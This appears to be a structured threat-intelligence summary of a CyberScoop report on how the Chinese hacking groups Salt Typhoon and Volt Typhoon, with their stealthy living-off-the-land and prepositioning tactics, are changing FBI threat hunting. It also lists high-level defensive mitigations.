Full Report
Two major hacking groups have pushed the bureau to adapt how they respond to stealthier, more patient attacks, a top FBI official said. The post China’s ‘Typhoons’ changing the way FBI hunts sophisticated threats appeared first on CyberScoop.
Analysis Summary
# Threat Actor: Salt Typhoon and Volt Typhoon
## Attribution & Identity
The threats are attributed to sophisticated, patient, Chinese hacking groups.
* **Salt Typhoon:** Identified as the group behind a massive, multi-year telecommunications hack.
* **Volt Typhoon:** Identified as a group infiltrating critical infrastructure with the intent to cause disruption if China invades Taiwan and the US intervenes.
## Activity Summary
Two major Chinese hacking groups, Salt Typhoon and Volt Typhoon, have forced the FBI to adapt its hunting methodology due to increasingly stealthy and patient attack patterns.
* **Salt Typhoon:** Responsible for a massive, long-running telecommunications hack.
* **Volt Typhoon:** Focused on prepositioning capabilities in critical infrastructure to enable future network disruption/attack.
* Both groups exhibit a shift from "noisy" rapid data theft to persistent access and stealthier infiltration.
## Tactics, Techniques & Procedures
The TTPs emphasize stealth, persistence, and avoiding traditional forensic indicators.
* Use of **“living off the land” (LotL)** techniques, utilizing legitimate tools within systems to camouflage activity.
* Focus on **persistent access**, rather than quick data exfiltration.
* Reduced reliance on dropping obvious malware or tools, resulting in fewer easily shareable Indicators of Compromise (IOCs).
* Shift in intent observed by CISA from purely espionage to **computer network attack (CNA)** and **prepositioning for disruption**.
## Targeting
The targeting indicates a focus on key infrastructure and supporting networks.
* **Sectors:** Telecommunications, Critical Infrastructure, Organizations shifting to the cloud.
* **Geography:** United States networks are explicitly mentioned as targets for disruption (linked to potential Taiwan intervention scenario).
* **Victims:** Telecommunications networks (for Salt Typhoon); general critical infrastructure (for Volt Typhoon). Targeting has shifted toward **cloud environments** and **edge devices** (VPNs, services provided by Managed Service Providers).
## Tools & Infrastructure
* **Malware families used:** Not explicitly detailed, but reliance on LotL techniques suggests reduced custom malware usage.
* **Infrastructure (C2, domains, IPs):** No specific URLs or IPs were detailed in the provided text.
## Implications
The sophisticated, patient, and stealthy operations of these groups (especially the LotL focus) complicate traditional threat hunting and indicator sharing for agencies like the FBI and CISA. There is a significant strategic shift observed from espionage towards potential pre-positioning for destructive or disruptive cyber operations.
## Mitigations
* **Proactive Hunting Posture:** Agencies must hunt "as if they’re already on the network."
* **Focus Beyond Traditional IOCs:** Mitigation efforts need to account for low IOC environments due to LotL usage.
* **Increased Visibility in New Areas:** Organizations must gain better insight into attacks targeting cloud environments and edge devices (like VPNs and MSP services) where visibility is traditionally low.